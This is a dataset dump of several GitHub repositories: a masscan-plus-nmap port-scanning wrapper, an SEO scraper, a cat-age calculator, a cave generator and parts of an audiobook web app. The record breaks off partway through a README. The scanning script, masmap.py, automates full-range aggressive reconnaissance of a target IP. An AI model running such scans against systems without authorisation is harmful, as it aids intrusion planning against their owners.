repo_name (string, 5–114 chars) | repo_url (string, 24–133 chars) | snapshot_id (string, 40 chars) | revision_id (string, 40 chars) | directory_id (string, 40 chars) | branch_name (string, 209 classes) | visit_date (timestamp[ns]) | revision_date (timestamp[ns]) | committer_date (timestamp[ns]) | github_id (int64, 9.83k–683M, ⌀ nullable) | star_events_count (int64, 0–22.6k) | fork_events_count (int64, 0–4.15k) | gha_license_id (string, 17 classes) | gha_created_at (timestamp[ns]) | gha_updated_at (timestamp[ns]) | gha_pushed_at (timestamp[ns]) | gha_language (string, 115 classes) | files (list, 1–13.2k items) | num_files (int64, 1–13.2k) |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
avavav777/masmap | https://github.com/avavav777/masmap | b92b5c7ea783642c79fd92ced05e99ae00c3b72a | bf34df1618aeea6a6f5dd048affe254a601b51f9 | 3bbea33b83e970d27e27a55960a5190de17f14a7 | refs/heads/master | 2021-06-12T13:29:45.605873 | 2017-03-21T09:54:29 | 2017-03-21T09:54:29 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5781071782112122,
"alphanum_fraction": 0.6134549379348755,
"avg_line_length": 28.233333587646484,
"blob_id": "f72bf9552d433b83a619cf71c0309c74bb4d366b",
"content_id": "52fca87effe37c66e245769f05c60c84dd2d33dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 877,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 30,
"path": "/masmap.py",
"repo_name": "avavav777/masmap",
"src_encoding": "UTF-8",
"text": "# coding=u8\nimport sys,os\n\nip=sys.argv[1]\n\ndef masscan(ip):\n\tfor x in xrange(0,3):\n\t\t# os.system('masscan -p1-65535 --rate=10000 -oL {tmp} {ip}'.format(tmp='/tmp/tmp_result_'+str(x),ip=ip))\n\t\tos.system('/opt/masscan/bin/masscan -p1-65535 --rate=10000 -oG {tmp} {ip}'.format(tmp='/tmp/tmp_result_'+str(x),ip=ip))\n\ndef selectPorts():\n\tos.system('cat /tmp/tmp_result_0 /tmp/tmp_result_1 /tmp/tmp_result_2 | sort | uniq > /tmp/tmp_result')\n\tos.system('sed -i \\'/#/d\\' /tmp/tmp_result')\n\tports=''\n\twith open('/tmp/tmp_result') as f:\n\t\tfor line in f:\n\t\t\tif ports != '':\n\t\t\t\tports += ','\n\t\t\tport = line.split()\n\t\t\tports += port[4].replace('/','').replace('open','').replace('tcp','')\n\treturn ports\n\n\ndef nmap(ip,ports):\n\tos.system('nmap -Pn -T5 -sV -A {ip} -p{ports} -oN result'.format(ip=ip,ports=ports))\n\nif __name__ == '__main__':\n\tmasscan(ip)\n\tports=selectPorts()\n\tnmap(ip,ports)\n"
}
] | 1 |
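The masmap.py script above is Python 2 (`xrange`, `os.system`) and merges its three masscan passes with a `cat | sort | uniq` pipeline plus a chain of `replace()` calls. A minimal Python 3 sketch of that merge step, assuming masscan's grepable (`-oG`) output carries tokens of the form `80/open/tcp//...` (field layout can vary by masscan version):

```python
# Sketch: collect open ports from several masscan -oG result files,
# replacing the shell pipeline and replace() chain in selectPorts().
import re

def select_ports(paths):
    ports = set()
    for path in paths:
        with open(path) as f:
            for line in f:
                if line.startswith('#'):   # grepable-format comment lines
                    continue
                ports.update(int(p) for p in re.findall(r'(\d+)/open/', line))
    return ','.join(map(str, sorted(ports)))

# e.g. select_ports('/tmp/tmp_result_%d' % x for x in range(3))
```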
ckwojai/idk | https://github.com/ckwojai/idk | 460ffe50730b57b3b0c8520a13502f36475ea112 | 80e8ce5514162b7eb58721091a2f7c3543b7f418 | 8ffb0d83254bdd13cb870b3079e68fa3b24f6398 | refs/heads/master | 2021-07-10T08:41:47.894144 | 2017-10-09T10:11:14 | 2017-10-09T10:11:14 | 106,259,861 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7473683953285217,
"alphanum_fraction": 0.7473683953285217,
"avg_line_length": 93,
"blob_id": "7fe21999573c28d2e282d3428eeb899482a651e2",
"content_id": "da407fcefcaab7c2d951d987cf78b78972b8cbc2",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 190,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 2,
"path": "/pk.py",
"repo_name": "ckwojai/idk",
"src_encoding": "UTF-8",
"text": "i don't knwo what i m suppsoed to say but I can just figure it out and hope and pray\ni say her my name and says it's nice to meet ya then she handed me a cup of water, filled with tequila\n\n\n"
}
] | 1 |
davidlares/beautifulsoup-scraping-examples | https://github.com/davidlares/beautifulsoup-scraping-examples | b1e79194e9ba464df9844638931a251b790a1fe3 | bab49a099407e2db93c2fd569a4c66ca62c3f81f | 4c5523db268d68b7b90831adbdeef627bed7e9bd | refs/heads/master | 2021-11-04T12:06:36.500761 | 2019-04-27T23:08:45 | 2019-04-27T23:08:45 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7578616142272949,
"alphanum_fraction": 0.7610062956809998,
"avg_line_length": 31.931034088134766,
"blob_id": "b8f4b0f9078850bb6c8e63a47cfe7673d45715a1",
"content_id": "79b9ac3053d9db73f67a3c011270154eaa40183d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 954,
"license_type": "permissive",
"max_line_length": 219,
"num_lines": 29,
"path": "/README.md",
"repo_name": "davidlares/beautifulsoup-scraping-examples",
"src_encoding": "UTF-8",
"text": "# davidSoup\n\nThis repo contains Python functions with a bunch a different utilities SEO focused, this package could be very useful for SEO common activities such h1 tags counters, keywords presence, size weight, and other functions.\n\nFeel free to use them for any integration of personal project. We use the Python official website for this example, but can apply to any other URL around\n\n## Running script (considering a perfect running env)\n\nSimple: just `python3 seo.py`\nAll the scripts does not have any relation between each other. You can use it in any particular order\n\n## What does this script do evaluates?\n\n\t- Meta Description evaluation\n\t- HTTPS Existance / or HTTP\n\t- Given URL (www presence)\n\t- Site weight\n\t- Stracting the <title> Content tag\n\t- Google Analytics presence\n\t- Site keywords\n\t- Site links and response codes\n\n## Credits\n\n - [David Lares](https://twitter.com/davidlares3)\n\n## License\n\n - [MIT](https://opensource.org/licenses/MIT)"
},
{
"alpha_fraction": 0.6157079339027405,
"alphanum_fraction": 0.6214867234230042,
"avg_line_length": 27.207406997680664,
"blob_id": "46c5046a1a77c207ce79689c8b1cb6dcb856fcb6",
"content_id": "75aa6a5c80bed562cbd2b9433f7903fb4da25596",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3807,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 135,
"path": "/seo.py",
"repo_name": "davidlares/beautifulsoup-scraping-examples",
"src_encoding": "UTF-8",
"text": "import urllib.request as request\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\nimport os\n\n# verify https existance\nprint(\"HTTPS EXISTANCE\")\nprint(\"=================================\")\nreq = request.Request('http://python.org')\nresult = request.urlopen(req)\nprint(result.geturl())\nprint(\" \")\n\n# site weight\nprint(\"SITE WEIGHT\")\nprint(\"=================================\")\nurl = \"https://python.org\"\nsite = request.urlopen(url)\nmeta = site.info()\nprint(\"Content-Length (kbs): \", site.headers['content-length'])\nprint(\" \")\n\n# real site weight (disk)\nprint(\"REAL SITE WEIGHT\")\nprint(\"=================================\")\nf = open('out.txt','r')\nprint(\"File on disk: \", len(f.read()))\nf.close()\n\nf = open('out.txt','wb')\nf.write(site.read())\nsite.close()\nf.close()\n\nf = open('out.txt','r')\nprint(\"File on disk after download: \", len(f.read()))\nf.close()\nprint('os.stat().st_size returns: ', os.stat('out.txt').st_size)\nprint(\" \")\n\n# check www url existance\nprint(\"WWW URL EXISTANCE\")\nprint(\"=================================\")\nreq = request.Request('http://python.org')\nres = request.urlopen(req)\nprint(\"Check www: \", res.geturl())\nprint(\" \")\n\n# check meta description < 150 chars\nprint(\"CHECK IF META IS BELOW 150 CHARS\")\nprint(\"=================================\")\nsite = request.urlopen('http://python.org')\nsoup = BeautifulSoup(site,features=\"html.parser\")\ndescription = soup.find('meta', attrs = {'name': 'description'})\nprint(\"Meta description size: \", len(description.get('content')))\nif(len(description.get('content')) < 150):\n\tprint(\"Description is lower than standard\")\nprint(\" \")\n\n# check title\nprint(\"WEBSITE TITLE\")\nprint(\"=================================\")\n\nhtml = request.urlopen('http://python.org')\nsoup = BeautifulSoup(html.read(),features=\"html.parser\")\nprint(\"Title size is: \", len(soup.html.head.title.string))\nprint(\"Title: \", soup.html.head.title.string)\nprint(\" \")\n\n# keywords\nprint(\"WEBSITE KEYWORDS\")\nprint(\"=================================\")\nsite = request.urlopen('http://python.org')\nsoup = BeautifulSoup(site,features=\"html.parser\")\nkeywords = soup.find('meta', attrs = {'name': 'keywords'})\nprint(\"Python.org Keywords: \", keywords.get('content'))\nwords = keywords.get('content').split()\nprint(\"WORD LIST\")\nfor word in words:\n\tprint(word, len(soup.findAll(text = re.compile(word))))\nprint(\" \")\n\n# image\nprint(\"WEBSITE LOGO/IMAGE URL\")\nprint(\"=================================\")\nsite = request.urlopen('http://python.org')\nsoup = BeautifulSoup(site,features=\"html.parser\")\ncount = 1\nfor image in soup.findAll('img'):\n\tprint('Image #{}', count, \": \", image[\"src\"])\n\tcount += 1\nprint(\" \")\n\n# h1 headings\nprint(\"H1 HEADINGS COUNTERS\")\nprint(\"=================================\")\nsite = request.urlopen('http://python.org')\nsoup = BeautifulSoup(site,features=\"html.parser\")\nfor h1 in soup.find_all('h1'):\n\tprint(\"h1 element: \", h1)\nprint('Total (h1s): ', len(soup.find_all('h1')))\nprint(\" \")\n\n# links lists\nprint(\"LINKS LIST\") \nprint(\"=================================\")\nsite = request.urlopen('http://python.org')\nsoup = BeautifulSoup(site,features=\"html.parser\")\nlinks = []\n\n# getting links\nelements = soup.select('a')\nfor element in elements:\n\tlink = element.get('href')\n\tif link.startswith('http'):\n\t\tlinks.append(link) # inserting into a list \nprint(links)\nprint(\" 
\")\n# checking the url and http status code\nfor link in links[:10]: \n\tcrequest = urlopen(link)\n\tprint(\"Link: \", link, \"Response: \", crequest.code)\nprint(\" \")\n\nprint(\"ANALYTICS CHECKER\")\nprint(\"=================================\")\n# google analytics\nsite = request.urlopen('http://python.org')\nsoup = BeautifulSoup(site, features=\"html.parser\")\nif soup.findAll(text = re.compile('.google-analytics')):\n\tprint('Site have Google Analytics')\nelse:\n\tprint('Do not have Google Analytics')\nprint(\" \")"
}
] | 2 |
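seo.py above opens a fresh connection to http://python.org for almost every check. Its meta-description test, condensed into a sketch that fetches and parses once and guards against a missing tag (same libraries and the same 150-character threshold as the original):

```python
from urllib.request import urlopen
from bs4 import BeautifulSoup

# One fetch, one parse, then the description-length check from seo.py.
soup = BeautifulSoup(urlopen('https://python.org').read(),
                     features='html.parser')
tag = soup.find('meta', attrs={'name': 'description'})
content = tag.get('content', '') if tag else ''
print('Meta description size:', len(content))
if len(content) < 150:
    print('Description is below the 150-character threshold')
```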
shinriyo/mewcalc | https://github.com/shinriyo/mewcalc | 8eb62f67639d94e6d0e9ff597930b1fb9d6da8b0 | d70781cb31fa8492ecabf032b026576941f17510 | 8dbf5cda5e82da5d6fa8cb1557aec4ad29ae15c4 | refs/heads/master | 2021-01-02T22:39:08.916561 | 2016-01-03T23:11:50 | 2016-01-03T23:11:50 | 28,327,440 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5087719559669495,
"alphanum_fraction": 0.5163742899894714,
"avg_line_length": 23.428571701049805,
"blob_id": "18c9cff7d29d49a50d0f604aeb49ec9f3b93b128",
"content_id": "4bdbb9e25191498d7293e8c676cf23ce71741f67",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1888,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 70,
"path": "/lib/mewcalc/mewcalc/mewcalc.py",
"repo_name": "shinriyo/mewcalc",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom datetime import datetime, date, time\n\n\nclass NonvalidYearException(Exception): # Exceptionを継承\n def __init__(self, value):\n self.value = value\n\n def __str__(self):\n return repr(self.value)\n\n\nclass MewCalc:\n def __init__(self):\n \"\"\"\n 初期化\n \"\"\"\n pass\n\n def calculate_by_year(self, year):\n \"\"\"\n 人間の歳で猫の年齢計算する\n :param year: 人間の歳\n :return: 猫の年齢\n \"\"\"\n if year <= 0:\n raise NonvalidYearException(\"year is not valid\")\n return 24 + (year - 2) * 4\n\n def calculate_human_age(self, born):\n \"\"\"\n 普通に人間的な年齢を計算する\n :param born: date型の日付\n :return: 猫の年齢\n \"\"\"\n today = date.today()\n try:\n birthday = born.replace(year=today.year)\n except ValueError: # raised when birth date is February 29 and the current year is not a leap year\n birthday = born.replace(year=today.year, month=born.month + 1, day=1)\n if birthday > today:\n return today.year - born.year - 1\n else:\n return today.year - born.year\n\n\n def calc_less_than_zero(self, born):\n \"\"\"\n TODO: 2年目までの計算をする\n :param born:\n \"\"\"\n pass\n\n def calculate(self, born):\n \"\"\"\n 猫の年齢を計算する\n :param born:\n :return: 猫の年齢\n \"\"\"\n if type(born) == int:\n return self.calculate_by_year(born)\n else:\n # 人間の年齢計算して\n age = self.calculate_human_age(born)\n if age < 1:\n self.calc_less_than_zero(born)\n # 猫の年齢計算する\n return self.calculate_by_year(age)\n"
},
{
"alpha_fraction": 0.5384615659713745,
"alphanum_fraction": 0.5384615659713745,
"avg_line_length": 23,
"blob_id": "b67fed05b48f1266c1784b91093b04cc15d2805b",
"content_id": "a90f38b76c188ab350d167fffc83208ebf598ff0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 26,
"license_type": "permissive",
"max_line_length": 23,
"num_lines": 1,
"path": "/lib/__init__.py",
"repo_name": "shinriyo/mewcalc",
"src_encoding": "UTF-8",
"text": "__author__ = 'shinriyo'\n\n\n"
},
{
"alpha_fraction": 0.4862543046474457,
"alphanum_fraction": 0.5206185579299927,
"avg_line_length": 19.421052932739258,
"blob_id": "0ac32301c6c736bf00f86224cbf842529eb5806e",
"content_id": "cbc6bf67a0523af0246743c00402778962cf539a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1196,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 57,
"path": "/lib/mewcalc/test/test_mewcalc.py",
"repo_name": "shinriyo/mewcalc",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport random\nimport unittest\nfrom lib.mewcalc.mewcalc import MewCalc\n\nfrom datetime import datetime, date, time\n\n\nclass MewCalcTest(unittest.TestCase):\n def setUp(self):\n self.mc = MewCalc()\n\n def test_human_age(self):\n \"\"\"\n 人間の年\n \"\"\"\n born = date(1984, 1, 4)\n res = self.mc.calculate_human_age(born)\n self.assertEqual(res, 30)\n\n def test_cat_age(self):\n \"\"\"\n 猫の年\n \"\"\"\n born = date(1984, 1, 4)\n res = self.mc.calculate(born)\n self.assertEqual(res, 30)\n\n def test_cat_year_age1(self):\n \"\"\"\n 2年は24歳\n \"\"\"\n year = 2\n res = self.mc.calculate_by_year(year)\n self.assertEqual(res, 24)\n\n def test_cat_year_age2(self):\n \"\"\"\n 3年は28歳\n \"\"\"\n year = 3\n res = self.mc.calculate_by_year(year)\n self.assertEqual(res, 24)\n\n def test_cat_year_age3(self):\n \"\"\"\n 19年は92歳\n \"\"\"\n year = 19\n res = self.mc.calculate_by_year(year)\n self.assertEqual(res, 92)\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.6604244709014893,
"alphanum_fraction": 0.6791510581970215,
"avg_line_length": 11.121212005615234,
"blob_id": "5f6142fd0c1eebcb21d82599d9260b9e3f6fd7e3",
"content_id": "898de4dd0fb2d3db16998cf58c1d425ebc78eccf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1003,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 66,
"path": "/README.md",
"repo_name": "shinriyo/mewcalc",
"src_encoding": "UTF-8",
"text": "[](https://travis-ci.org/futoase/fizzbuzz)\n\nMew Calc\n====\n\nOverview\n\n## Description\n\n猫の人間の相当年齢を計算する。\n2年目は24歳で、その後4歳ずつ増える。\n[京都中央動物病院猫のQ&Aの年齢計算式](http://kyotochuoah.com/qa/neko_nenrei.html)を参考。\n\n## Demo\n\nN/A\n\n## VS. \n\nN/A\n\n## Requirement\n\nPython 2.7.x\n\n## Usage\n\n### インポート方法\n```\nfrom mewcalc import MewCalc\n```\n\n### 猫の年齢を生まれたdateから計算する\n```\nfrom datetime import datetime, date, time\nmc = MewCalc()\nborn = date(1998, 1, 4)\nres = mc.calculate(born)\n```\n\n### 猫の年齢を年から計算する\n```\nfrom datetime import datetime, date, time\nmc = MewCalc()\nyear = 19\nres = mc.calculate_by_year(year)\n```\n### 注意\n\n2年未満の計算は今後作ります。\n\n## Install\n\n```\npip install mewcalc\n```\n\n## Contribution\n\n## Licence\n\nMIT.\n\n## Author\n\n[shinriyo](https://github.com/shinriyo/)\n\n"
},
{
"alpha_fraction": 0.583106279373169,
"alphanum_fraction": 0.5885558724403381,
"avg_line_length": 27.230770111083984,
"blob_id": "7a14b1d2e9d5766c7feb9e139b0baaf6f590c18d",
"content_id": "7f293a4372876c4eb498d3d287758101a153f1dc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 367,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 13,
"path": "/info.py",
"repo_name": "shinriyo/mewcalc",
"src_encoding": "UTF-8",
"text": "# package information.\nINFO = dict(\n name = \"mewcalc\",\n description = \"The calculator fot cat's age\",\n author = \"shinriyo\",\n author_email = \"[email protected]\",\n license = \"MIT License\",\n url = \"https://github.com/shinriyo/mewcalc\",\n classifiers = [\n \"Programming Language :: Python :: 2.7\",\n \"License :: OSI Approved :: MIT License\"\n ]\n)\n"
}
] | 5 |
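The conversion rule stated in the mewcalc README (a cat counts as 24 "human years" at age two, then gains four per year) is exactly calculate_by_year above. A quick worked check against the values the README quotes:

```python
# Cat-age formula from the README: 24 at year two, +4 per year after.
def cat_age(years: int) -> int:
    if years <= 0:
        raise ValueError('year is not valid')
    return 24 + (years - 2) * 4

assert cat_age(2) == 24
assert cat_age(3) == 28   # note: test_cat_year_age2 above asserts 24 for
assert cat_age(19) == 92  # year 3, which contradicts the formula it tests
```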
PetarPeychev/drunk-caves | https://github.com/PetarPeychev/drunk-caves | 0ab69c02771fa5078c08294baec101b39c5d655f | b33ca13c5a08a4e188711c127fc32ef8a4053cd4 | 6200ffb653fe008667c2081131ea053f4de8cb9b | refs/heads/master | 2020-07-05T08:43:52.834443 | 2019-08-15T18:49:28 | 2019-08-15T18:49:28 | 202,594,613 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4752851724624634,
"alphanum_fraction": 0.5019011497497559,
"avg_line_length": 17.785715103149414,
"blob_id": "c62e21a4087ea2ed625fd58b1055600bb6a85ab5",
"content_id": "def5dcaf46214979d4b95ee737580361d9ff5bfc",
"detected_licenses": [
"Unlicense"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 263,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 14,
"path": "/test.py",
"repo_name": "PetarPeychev/drunk-caves",
"src_encoding": "UTF-8",
"text": "from generator import generate\n\nwidth = 40\nheight = 40\n\nmap = generate(width, height, 40)\n\nfor y in range(height):\n for x in range(width):\n if map[x][y] == 1:\n print('#', end = ' ')\n else:\n print(' ', end = ' ')\n print()\n"
},
{
"alpha_fraction": 0.47219982743263245,
"alphanum_fraction": 0.487510085105896,
"avg_line_length": 26.577777862548828,
"blob_id": "58827012e1107c27b96297ea4993184a00c3e6fe",
"content_id": "b185913e179f4e80bea8c80ce38538a08105e72a",
"detected_licenses": [
"Unlicense"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1241,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 45,
"path": "/generator.py",
"repo_name": "PetarPeychev/drunk-caves",
"src_encoding": "UTF-8",
"text": "import random\n\ndef generate(width, height, percentage):\n map = [[1 for i in range(height)] for j in range(width)]\n\n min_x = 1\n max_x = width - 2\n\n min_y = 1\n max_y = height - 2\n\n x = random.randint(min_x, max_x)\n y = random.randint(min_y, max_y)\n\n map_cells = width * height\n filled_cells = 0\n filled_percentage = 0\n\n previous_delta_x = 0\n previous_delta_y = 0\n\n while filled_percentage <= percentage:\n if map[x][y] == 1:\n map[x][y] = 0\n filled_cells += 1\n filled_percentage = filled_cells / map_cells * 100\n\n if random.choice([True, False]):\n delta_x = random.choice([1, -1, previous_delta_x])\n if x + delta_x < min_x or x + delta_x > max_x:\n x = x - delta_x\n previous_delta_x = -delta_x\n else:\n x = x + delta_x\n previous_delta_x = delta_x\n else:\n delta_y = random.choice([1, -1, previous_delta_y])\n if y + delta_y < min_y or y + delta_y > max_y:\n y = y - delta_y\n previous_delta_y = -delta_y\n else:\n y = y + delta_y\n previous_delta_y = delta_y\n\n return map\n"
},
{
"alpha_fraction": 0.8333333134651184,
"alphanum_fraction": 0.8333333134651184,
"avg_line_length": 41,
"blob_id": "570e5d49091e2431623b942f5fae766deccbca3d",
"content_id": "490aaaf63285d72d2c9e4c764dcd098d86635aef",
"detected_licenses": [
"Unlicense"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 84,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 2,
"path": "/README.md",
"repo_name": "PetarPeychev/drunk-caves",
"src_encoding": "UTF-8",
"text": "# drunk-caves\nsample of drunkard's walk algorithm for procedural content generation\n"
}
] | 3 |
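generator.py above is a drunkard's walk with a momentum bias (previous_delta_x/y can repeat the last step) and a reflect-at-the-border rule. The bare algorithm, sketched without those two refinements:

```python
import random

# Minimal drunkard's walk: carve open cells (0) into a grid of walls (1)
# until `percentage` percent of all cells are open; the border stays solid.
def drunkard_walk(width, height, percentage, seed=None):
    rng = random.Random(seed)
    grid = [[1] * height for _ in range(width)]
    x = rng.randrange(1, width - 1)
    y = rng.randrange(1, height - 1)
    carved, target = 0, width * height * percentage / 100
    while carved < target:
        if grid[x][y] == 1:
            grid[x][y] = 0
            carved += 1
        dx, dy = rng.choice([(1, 0), (-1, 0), (0, 1), (0, -1)])
        x = min(max(x + dx, 1), width - 2)   # clamp inside the border
        y = min(max(y + dy, 1), height - 2)
    return grid
```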
ralflopez/Audiobook50 | https://github.com/ralflopez/Audiobook50 | cf7c5c28b347dc7ded3c8053579d1d5c30d8ba64 | 74a584f1785edbdd8e0d99271459f6c8d59c0bc4 | c73ed58260d19c6bf327c2b1245c8bc2aff1b8d4 | refs/heads/main | 2023-06-14T15:54:09.232606 | 2021-07-09T07:17:21 | 2021-07-09T07:17:21 | 381,249,101 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5549569129943848,
"alphanum_fraction": 0.5549569129943848,
"avg_line_length": 21.634145736694336,
"blob_id": "251bc614ce9be4e0b9a5502455e4c86e108dde33",
"content_id": "e32f796057ab4c2b19e9e43c82e2d29aa3facd8f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 928,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 41,
"path": "/website/models/schema.py",
"repo_name": "ralflopez/Audiobook50",
"src_encoding": "UTF-8",
"text": "user_schema = \"\"\"\n CREATE TABLE users (\n id INTEGER, \n username TEXT NOT NULL, \n hash TEXT NOT NULL, \n PRIMARY KEY(id)\n );\n CREATE UNIQUE INDEX username ON users (username);\n\"\"\"\n\nauthor_schema = \"\"\"\n CREATE TABLE authors (\n id INTEGER,\n name TEXT,\n PRIMARY KEY(id)\n );\n\"\"\"\n\nbook_schema = \"\"\"\n CREATE TABLE books (\n id TEXT UNIQUE NOT NULL,\n title TEXT,\n author_id INTEGER,\n contributor_id INTEGER,\n PRIMARY KEY(id),\n FOREIGN KEY (author_id) REFERENCES authors(id),\n FOREIGN KEY (contributor_id) REFERENCES users(id)\n );\n\"\"\"\n\nsaves_scema = \"\"\"\n CREATE TABLE saves (\n id INTEGER,\n user_id INTEGER,\n book_id INTEGER,\n PRIMARY KEY(id),\n FOREIGN KEY(user_id) REFERENCES users(id),\n FOREIGN KEY(book_id) REFERENCES books(id),\n UNIQUE(user_id, book_id)\n );\n\"\"\"\n"
},
{
"alpha_fraction": 0.4863336384296417,
"alphanum_fraction": 0.4891611635684967,
"avg_line_length": 26.230770111083984,
"blob_id": "2cc25d16a2b2bb0fde23ee536259f73b5e89c5aa",
"content_id": "b8d9c1be3316970221753b7b76f05c115386e531",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1061,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 39,
"path": "/website/packages/SQL/__init__.py",
"repo_name": "ralflopez/Audiobook50",
"src_encoding": "UTF-8",
"text": "import sqlite3\n\nclass SQL:\n def __init__(self, uri):\n self.uri = uri\n \n def execute(self, query_string, *args):\n self.connection = sqlite3.connect(self.uri)\n self.connection.row_factory = self.dict_factory\n self.cursor = self.connection.cursor()\n params = args if len(args) else None\n \n if params:\n try:\n self.cursor.execute(query_string, args)\n rows = self.cursor.fetchall()\n except ValueError:\n print('***************ERRRORROOR*************')\n print(ValueError)\n rows = []\n else:\n try:\n self.cursor.execute(query_string)\n rows = self.cursor.fetchall()\n except:\n rows = []\n\n\n self.connection.commit()\n self.connection.close()\n\n return rows\n \n\n def dict_factory(self, cursor, row):\n d = {}\n for idx, col in enumerate(cursor.description):\n d[col[0]] = row[idx]\n return d"
},
{
"alpha_fraction": 0.41431811451911926,
"alphanum_fraction": 0.42403629422187805,
"avg_line_length": 48.80644989013672,
"blob_id": "b4e22d07b7bbf71cacc43bbbb0c09abfbeca0814",
"content_id": "45315dbe9a438fb30a7f924fafc3d491d14aa0b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 3087,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 62,
"path": "/website/templates/profile.html",
"repo_name": "ralflopez/Audiobook50",
"src_encoding": "UTF-8",
"text": "{% extends \"layout.html\" %}\n\n{% block title %}\n Profile\n{% endblock %}\n\n{% block style %}\n <link href=\"{{url_for('static', filename=\"css/card.css\")}}\" rel=\"stylesheet\" />\n <style>#navlink-profile { font-weight: bold }</style>\n{% endblock %}\n\n{% block main%}\n <div class=\"mt-5 pt-5\">\n <div class=\"container\">\n <div class=\"row\">\n <div class=\"col-12\">\n <h2 class=\"text-center mb-3\">Hello, Name</h2>\n <div class=\"text-center mb-4\">\n <form action=\"/logout\" method=\"GET\">\n <button class=\"btn btn-primary mx-auto\">Log Out</button>\n </form>\n </div>\n </div>\n <div class=\"col-6\">\n <h5 class=\"text-center mb-3\">Saved Books</h5>\n {% if saves_list|length > 0 %}\n {% for book in saves_list %}\n <div class=\"card mb-3 {% if book.contributor_id == user_id %}mine{% else %}not-mine{% endif %}\">\n <div class=\"card-body\">\n <h5 class=\"card-title\">{{book.title}}</h5>\n <h6 class=\"card-subtitle mb-4 text-muted\">{{book.author}}</h6>\n <a href=\"book/{{book.id}}\" class=\"card-link text-primary text-decoration-none\">Read / Listen</a>\n <a class=\"card-link text-primary text-decoration-none unsave cursor-pointer\" for=\"{{book.id}}\">Unsave</a>\n </div>\n </div>\n {% endfor %}\n {% endif %}\n </div>\n <div class=\"col-6\">\n <h5 class=\"text-center mb-3\">Contributions</h5>\n {% if contribution_list|length > 0 %}\n {% for book in contribution_list %}\n <div class=\"card mb-3 {% if book.contributor_id == user_id %}mine{% else %}not-mine{% endif %}\">\n <div class=\"card-body\">\n <h5 class=\"card-title\">{{book.title}}</h5>\n <h6 class=\"card-subtitle mb-4 text-muted\">{{book.author}}</h6>\n <a href=\"book/{{book.id}}\" class=\"card-link text-primary text-decoration-none\">Read / Listen</a>\n <a class=\"card-link text-primary text-decoration-none save cursor-pointer\" for=\"{{book.id}}\">Save</a>\n <a class=\"card-link text-primary text-decoration-none delete-book cursor-pointer\" for=\"{{book.id}}\">Delete</a>\n </div>\n </div>\n {% endfor %}\n {% endif %}\n </div>\n </div>\n </div>\n </div>\n{% endblock %}\n\n{% block script %}\n <script src=\"{{url_for('static', filename='js/catalogue/save.js')}}\"></script>\n{% endblock %}"
},
{
"alpha_fraction": 0.6938775777816772,
"alphanum_fraction": 0.7074829936027527,
"avg_line_length": 21.96875,
"blob_id": "94fc1f5afd04b2f01473d85e885a0aaa81046e9d",
"content_id": "f4b3fa24fa08aa5c900dca635c2aae6d756e1d41",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 735,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 32,
"path": "/README.md",
"repo_name": "ralflopez/Audiobook50",
"src_encoding": "UTF-8",
